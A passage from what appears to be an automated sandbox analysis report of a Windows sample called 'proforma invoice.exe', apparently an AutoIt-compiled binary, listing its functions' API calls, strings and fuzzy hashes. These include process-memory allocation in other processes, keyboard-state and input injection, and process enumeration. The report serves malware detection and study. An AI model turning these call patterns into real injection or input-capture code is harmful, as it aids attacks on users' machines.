                    • Part of subcall function 00B0B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B02194,00000034,?,?,00001004,00000000,00000000), ref: 00B0B365
                    • Part of subcall function 00B0B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B02194,00000034,?,?,00001004,00000000,00000000), ref: 00B0B37B
                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B027CD
                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B0281A
                  Strings
                  Similarity
                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                  • String ID: @
                  • API String ID: 4150878124-2766056989
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\proforma invoice.exe,00000104), ref: 00AD1769
                  • _free.LIBCMT ref: 00AD1834
                  • _free.LIBCMT ref: 00AD183E
                  Strings
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Users\user\Desktop\proforma invoice.exe
                  • API String ID: 2506810119-2184432382
                  APIs
                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B0C306
                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00B0C34C
                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B71990,014F6228), ref: 00B0C395
                  Strings
                  Similarity
                  • API ID: Menu$Delete$InfoItem
                  • String ID: 0
                  • API String ID: 135850232-4108050209
                  APIs
                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B3CC08,00000000,?,?,?,?), ref: 00B344AA
                  • GetWindowLongW.USER32 ref: 00B344C7
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B344D7
                  Strings
                  Similarity
                  • API ID: Window$Long
                  • String ID: SysTreeView32
                  • API String ID: 847901565-1698111956
                  APIs
                    • Part of subcall function 00B2335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00B23077,?,?), ref: 00B23378
                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
                  • _wcslen.LIBCMT ref: 00B2309B
                  • htons.WSOCK32(00000000,?,?,00000000), ref: 00B23106
                  Strings
                  Similarity
                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                  • String ID: 255.255.255.255
                  • API String ID: 946324512-2422070025
                  APIs
                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B33F40
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B33F54
                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B33F78
                  Strings
                  Similarity
                  • API ID: MessageSend$Window
                  • String ID: SysMonthCal32
                  • API String ID: 2326795674-1439706946
                  APIs
                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B34705
                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B34713
                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B3471A
                  Strings
                  Similarity
                  • API ID: MessageSend$DestroyWindow
                  • String ID: msctls_updown32
                  • API String ID: 4014797782-2298589950
                  APIs
                  Strings
                  Similarity
                  • API ID: _wcslen
                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                  • API String ID: 176396367-2734436370
                  APIs
                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B33840
                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B33850
                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B33876
                  Strings
                  Similarity
                  • API ID: MessageSend$MoveWindow
                  • String ID: Listbox
                  • API String ID: 3315199576-2633736733
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00B14A08
                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B14A5C
                  • SetErrorMode.KERNEL32(00000000,?,?,00B3CC08), ref: 00B14AD0
                  Strings
                  Similarity
                  • API ID: ErrorMode$InformationVolume
                  • String ID: %lu
                  • API String ID: 2507767853-685833217
                  APIs
                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B3424F
                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B34264
                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B34271
                  Strings
                  Similarity
                  • API ID: MessageSend
                  • String ID: msctls_trackbar32
                  • API String ID: 3850602802-1010561917
                  APIs
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                    • Part of subcall function 00B02DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B02DC5
                    • Part of subcall function 00B02DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B02DD6
                    • Part of subcall function 00B02DA7: GetCurrentThreadId.KERNEL32 ref: 00B02DDD
                    • Part of subcall function 00B02DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B02DE4
                  • GetFocus.USER32 ref: 00B02F78
                    • Part of subcall function 00B02DEE: GetParent.USER32(00000000), ref: 00B02DF9
                  • GetClassNameW.USER32(?,?,00000100), ref: 00B02FC3
                  • EnumChildWindows.USER32(?,00B0303B), ref: 00B02FEB
                  Strings
                  Similarity
                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                  • String ID: %s%d
                  • API String ID: 1272988791-1110647743
                  APIs
                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B358C1
                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B358EE
                  • DrawMenuBar.USER32(?), ref: 00B358FD
                  Strings
                  Similarity
                  • API ID: Menu$InfoItem$Draw
                  • String ID: 0
                  • API String ID: 3227129158-4108050209
                  APIs
                  Similarity
                  • API ID: __alldvrm$_strrchr
                  • String ID:
                  • API String ID: 1036877536-0
                  • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                  • Instruction ID: 74e734fc262ba0004de3aa167af007f5ad8203de4d5f6eeb3d8ad998a110cc7c
                  • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                  • Instruction Fuzzy Hash: A4A13772D003869FEB25CF18C8917AEBBF5EF69350F18426FE5969B381C2388941C751
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearInitInitializeUninitialize
                  • String ID:
                  • API String ID: 1998397398-0
                  • Opcode ID: 7d878010d71d1dad6f9afa94170bd2ed5043adbdc5c98d17930aef6a35cf36e8
                  • Instruction ID: 5f5e3fae79927ed006117f5ff4b5f48b41f373a8692586551b08cde933ffe858
                  • Opcode Fuzzy Hash: 7d878010d71d1dad6f9afa94170bd2ed5043adbdc5c98d17930aef6a35cf36e8
                  • Instruction Fuzzy Hash: D5A16D756043119FC700EF24D985A2EB7E5FF89714F048899F98A9B3A2DB34EE01CB91
                  APIs
                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B005F0
                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B00608
                  • CLSIDFromProgID.OLE32(?,?,00000000,00B3CC40,000000FF,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B0062D
                  • _memcmp.LIBVCRUNTIME ref: 00B0064E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FromProg$FreeTask_memcmp
                  • String ID:
                  • API String ID: 314563124-0
                  • Opcode ID: d176e47009348dcbbb2243b8e8c2a4cee34fdaaf30de3e348bb2dd8f14e85689
                  • Instruction ID: 888a84b7355de5a58fd8cbaaa89bc4b9bf365f4c9948778ae298656a71923c6d
                  • Opcode Fuzzy Hash: d176e47009348dcbbb2243b8e8c2a4cee34fdaaf30de3e348bb2dd8f14e85689
                  • Instruction Fuzzy Hash: B781EE75A10109EFCB04DF94C984EEEBBF9FF89315F204598E516AB290DB71AE05CB60
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: 6fb518712003663e6bd011f6a93b868853baa288a6e0c39d7aa6e686b5d7bdc9
                  • Instruction ID: 56d23e42f2474cee3c0db800be2c7658a5719a0ddae2eb282c1341b7eba3b5f6
                  • Opcode Fuzzy Hash: 6fb518712003663e6bd011f6a93b868853baa288a6e0c39d7aa6e686b5d7bdc9
                  • Instruction Fuzzy Hash: DF415CB1A00561ABDB216BBA8D45BBE3AF5EF41330F15422AF41AD73D2E63488419361
                  APIs
                  • GetWindowRect.USER32(014FE718,?), ref: 00B362E2
                  • ScreenToClient.USER32(?,?), ref: 00B36315
                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00B36382
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ClientMoveRectScreen
                  • String ID:
                  • API String ID: 3880355969-0
                  • Opcode ID: 51f874f72453d59638f77eeca9508354d002695b8aedd4a0430847dffa99af07
                  • Instruction ID: c2df02068af4e2a5099a4dfd91394345eedcf07d2e2543535ba2db1f031dd985
                  • Opcode Fuzzy Hash: 51f874f72453d59638f77eeca9508354d002695b8aedd4a0430847dffa99af07
                  • Instruction Fuzzy Hash: 74512A75A00209EFCB14DF68D881AAE7BF5EB45360F208599F9559B2A0DB30ED81CB50
                  APIs
                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00B21AFD
                  • WSAGetLastError.WSOCK32 ref: 00B21B0B
                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B21B8A
                  • WSAGetLastError.WSOCK32 ref: 00B21B94
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$socket
                  • String ID:
                  • API String ID: 1881357543-0
                  • Opcode ID: 3f6fdbfe69efc8a4fe28cc982e5bbf441d20e4e6c97e6b7273ca58b1703d4bcd
                  • Instruction ID: 8c4f5287ddb4afc14f1f9eeaa351cc07f93d9ac0275d2fcd181901b98733a144
                  • Opcode Fuzzy Hash: 3f6fdbfe69efc8a4fe28cc982e5bbf441d20e4e6c97e6b7273ca58b1703d4bcd
                  • Instruction Fuzzy Hash: D841D234600210AFE720AF24D98AF6A77E5EB45718F548488F91A9F3D3D772DD418B90
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4390cb0066a7d4c61633dc47aca3ccad195d028f5b5e2e7064a866d23a41a0c5
                  • Instruction ID: 96c7ad1245768278f5f3992e1a7f0ee2fb1dad707bfb7c237176bc95996b5a78
                  • Opcode Fuzzy Hash: 4390cb0066a7d4c61633dc47aca3ccad195d028f5b5e2e7064a866d23a41a0c5
                  • Instruction Fuzzy Hash: 2F41E2B6A10354EFD724DF38C941BAABBB9EB88710F11852FF152DB382D771990187A0
                  APIs
                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B15783
                  • GetLastError.KERNEL32(?,00000000), ref: 00B157A9
                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B157CE
                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B157FA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateHardLink$DeleteErrorFileLast
                  • String ID:
                  • API String ID: 3321077145-0
                  • Opcode ID: 783ccad5cc1cdf13e153297da33934e1cb815d46b4e1223d5bae4ca28d75eda3
                  • Instruction ID: fe77daf749fdbb8867f7f80e58f33e92aff4074c4ac4bb44324a0ee6a824aa77
                  • Opcode Fuzzy Hash: 783ccad5cc1cdf13e153297da33934e1cb815d46b4e1223d5bae4ca28d75eda3
                  • Instruction Fuzzy Hash: D141EE35600611DFCB11EF55C585A5EBBE2EF89720F19C498E84A6B3A2CB34FD41CB91
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00AC6D71,00000000,00000000,00AC82D9,?,00AC82D9,?,00000001,00AC6D71,8BE85006,00000001,00AC82D9,00AC82D9), ref: 00ADD910
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00ADD999
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00ADD9AB
                  • __freea.LIBCMT ref: 00ADD9B4
                    • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  • Opcode ID: 016a82a006063a095919f7ce0b5581cab022cc487fe0739bd224d22d5b361535
                  • Instruction ID: faa9288d3a046d32e1e076f526d11507a5a8a63ae150b1ce3e678e5d4a91076c
                  • Opcode Fuzzy Hash: 016a82a006063a095919f7ce0b5581cab022cc487fe0739bd224d22d5b361535
                  • Instruction Fuzzy Hash: 4531E172A0020AABDF24CF64DC95EAE7BA5EB40310F154169FC05E7250EB36DD50CB90
                  APIs
                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00B35352
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B35375
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B35382
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B353A8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LongWindow$InvalidateMessageRectSend
                  • String ID:
                  • API String ID: 3340791633-0
                  • Opcode ID: 373a5ae92b169e32b899c45a6eda6febc0a603a7f2d4f84a57bd211b605a8560
                  • Instruction ID: dd108bd414795780087aac621d27d72de63830fd7087d61baa52b60ac2869eff
                  • Opcode Fuzzy Hash: 373a5ae92b169e32b899c45a6eda6febc0a603a7f2d4f84a57bd211b605a8560
                  • Instruction Fuzzy Hash: 8931C434A95A0CEFEB309E58CC46BE837E5EB05390F784181FA12971E1C7B0AD80DB59
                  APIs
                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B0ABF1
                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B0AC0D
                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B0AC74
                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B0ACC6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: KeyboardState$InputMessagePostSend
                  • String ID:
                  • API String ID: 432972143-0
                  • Opcode ID: c50a435c95d856e2e8f3a4c99140113a5d524e1da18e9b42fc92dd63484d4304
                  • Instruction ID: 64ac2889beab969415f735c4b64a96dda914ea365095ebf7c5e0b1885f80a664
                  • Opcode Fuzzy Hash: c50a435c95d856e2e8f3a4c99140113a5d524e1da18e9b42fc92dd63484d4304
                  • Instruction Fuzzy Hash: 32311030A04718AFFB358B648C09BFE7FE5EB89310F098A9AE485971D1C77499858792
                  APIs
                  • ClientToScreen.USER32(?,?), ref: 00B3769A
                  • GetWindowRect.USER32(?,?), ref: 00B37710
                  • PtInRect.USER32(?,?,00B38B89), ref: 00B37720
                  • MessageBeep.USER32(00000000), ref: 00B3778C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Rect$BeepClientMessageScreenWindow
                  • String ID:
                  • API String ID: 1352109105-0
                  • Opcode ID: f3188964a0088247dd81af40cbc37b765dd78529f29c76bda4652c560394253d
                  • Instruction ID: 9ac490be080256f301f80a06e31f0efef747527f69b52700d32dfe56ed80073c
                  • Opcode Fuzzy Hash: f3188964a0088247dd81af40cbc37b765dd78529f29c76bda4652c560394253d
                  • Instruction Fuzzy Hash: 54418DB4645214EFCB22CF98C895EA97BF5FB49314F2580E8E5259B261CB30AD42CF90
                  APIs
                  • GetForegroundWindow.USER32 ref: 00B316EB
                    • Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
                    • Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
                    • Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65
                  • GetCaretPos.USER32(?), ref: 00B316FF
                  • ClientToScreen.USER32(00000000,?), ref: 00B3174C
                  • GetForegroundWindow.USER32 ref: 00B31752
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                  • String ID:
                  • API String ID: 2759813231-0
                  • Opcode ID: d724b5c15fec78197a2b96aa6709d22042bb743244e1babaa2ebf259b4c4b27b
                  • Instruction ID: 98f974ee727f01e78d9e029da844a5181cabb3049ffce972984ee31b9a80cdba
                  • Opcode Fuzzy Hash: d724b5c15fec78197a2b96aa6709d22042bb743244e1babaa2ebf259b4c4b27b
                  • Instruction Fuzzy Hash: 583152B1E00249AFD700DFA9C981CAEBBFDEF49304B5484A9E415E7251DB31DE45CBA0
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00B0D501
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00B0D50F
                  • Process32NextW.KERNEL32(00000000,?), ref: 00B0D52F
                  • CloseHandle.KERNEL32(00000000), ref: 00B0D5DC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 655bc15071679a21a983c07e299fa59130427f89ecbec26b8e48b36eae420750
                  • Instruction ID: 636d744b02d5cb695c617621f13ac8f3dabcfc57b40f3bf62d4227d4338576fa
                  • Opcode Fuzzy Hash: 655bc15071679a21a983c07e299fa59130427f89ecbec26b8e48b36eae420750
                  • Instruction Fuzzy Hash: A6317E711082009FD300EF94CC85AAFBFE8EF9A354F14092DF585971E1EB719949CB92
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • GetCursorPos.USER32(?), ref: 00B39001
                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00AF7711,?,?,?,?,?), ref: 00B39016
                  • GetCursorPos.USER32(?), ref: 00B3905E
                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00AF7711,?,?,?), ref: 00B39094
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                  • String ID:
                  • API String ID: 2864067406-0
                  • Opcode ID: 8eea1ce6ff6c8293f671c39970e79a19918cdc9942e5e5b287763dc7701babef
                  • Instruction ID: 30f3fd55d453ba21602eee8b0fab125aceca51ecb8bc47fbca83a23463f9be8b
                  • Opcode Fuzzy Hash: 8eea1ce6ff6c8293f671c39970e79a19918cdc9942e5e5b287763dc7701babef
                  • Instruction Fuzzy Hash: 6D21D135600118EFCB298F98CC59EFE3BF9EF49350F204095F90557261C771A991DB60
                  APIs
                  • GetFileAttributesW.KERNEL32(?,00B3CB68), ref: 00B0D2FB
                  • GetLastError.KERNEL32 ref: 00B0D30A
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0D319
